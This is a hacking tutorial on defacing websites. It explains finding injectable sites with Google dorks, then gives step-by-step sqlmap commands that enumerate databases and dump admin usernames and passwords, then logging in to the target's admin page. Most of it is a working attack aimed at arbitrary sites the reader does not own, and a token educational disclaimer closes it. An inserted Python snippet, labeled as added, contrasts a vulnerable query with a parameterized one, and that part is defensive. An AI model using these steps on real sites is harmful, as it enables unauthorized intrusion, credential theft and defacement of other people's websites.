DEFACING WEBSITES USING SQLMAP


What is Sqlmap?

Sqlmap is one of the most powerful penetration testing tools available on the internet. It is one of my favorite tools and it is written in Python. You can use sqlmap to exploit SQL injection flaws and extract database information from vulnerable websites.

How to Find SQL Vulnerable Websites?

In order to use sqlmap you must have a website that is vulnerable to SQL injection. To find such websites you can use Google dorks. An example of a Google dork is: inurl:index.php?id=1
Big List of Google Dorks

How to test if a website is SQL Vulnerable?

In order to test whether a website is vulnerable to SQL injection, append a single quote (') to the URL parameter found with the Google dork:
Example: http://www.website.com/index.php?id=1'
If you get an error such as "You have an error in your SQL syntax", if an image disappears, or if you get a MySQL error, the website is vulnerable to SQL injection.
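Why the single quote breaks the page, as an added example (not part of the original post): the vulnerable lookup below builds its SQL by string concatenation, so the quote changes the query text and triggers the syntax error the test looks for; the parameterized version passes the same input as a bound value and simply returns no rows. The table and rows are constructed here with an in-memory SQLite database and are not the site's database.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample database standing in for the website's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(1, "Welcome"), (2, "News")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    # The request parameter is pasted into the SQL text, so a quote in the
    # input ends the literal early and the rest is parsed as SQL.
    sql = "SELECT title FROM articles WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, id_param: str) -> list:
    # The value is bound separately from the SQL text and can never alter
    # the query's structure, whatever characters it contains.
    return conn.execute("SELECT title FROM articles WHERE id = ?",
                        (id_param,)).fetchall()

def probe(lookup, id_param: str) -> tuple:
    """Return ("rows", rows) or ("error", message), i.e. what the page shows."""
    conn = make_db()
    try:
        return ("rows", lookup(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()

if __name__ == "__main__":
    for param in ("1", "1'"):
        print("vulnerable    ", repr(param), "->", probe(lookup_vulnerable, param))
        print("parameterized ", repr(param), "->", probe(lookup_parameterized, param))
```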

Exploitation Part - How to use Sqlmap

Copy the URL of the website without the ' : http://www.website.com/index.php?id=1
1) Open a terminal (or a command prompt if you are under Windows) and type the following command: ./sqlmap.py -u http://www.website.com/index.php?id=1 --dbs
-u   - the URL of the website
--dbs   - enumerate the databases on the vulnerable website

2) After that you will get the database name, for example: db_web . Now type this command in the terminal: ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web --tables
-D   - specify the database name we want to extract data from
--tables   - list the tables in that database

3) Now that we have the database name and the tables, we need to choose a table and extract its columns. If you want to hack the website you need the login data, which is usually located in tables with names like: users, usuarios, tbl_admin, admin_login, login, etc. Let's say we have a table named tbl_admin. To get its columns, type this into the terminal: ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web -T tbl_admin --columns
-T   - specify the table name we want to extract columns from
--columns   - list the columns of the previously specified table

4) Now the final step: we need to get the username and the password so we can log in to the website. Usually the columns containing the login info are named username, password or user, password, etc. Type this into the terminal: ./sqlmap.py -u http://www.website.com/index.php?id=1 -D db_web -T tbl_admin -C username,password --dump
-C   - specify the column names we want to extract data from
--dump   - dump the data contained in the previously specified columns

5) Now you have the login info. Next we need to find the login page of the website. To do that you need an admin finder script. There are plenty available, but I will share my own (coded by me). DOWNLOAD LINK FOR ADMIN FINDER.   Note: You need Python 2.7 installed in order to use it (already present on Linux, has to be installed on Windows). After you use this script and get the admin login page of the website, just enter the login info you got before and there you go: you are inside the admin page of your target.

Download Sqlmap from: http://sqlmap.org  

Download Python from: http://www.python.org/getit/

Disclaimer: This tutorial is for educational purposes only. We are not responsible for what you do. Use your knowledge for good purposes!
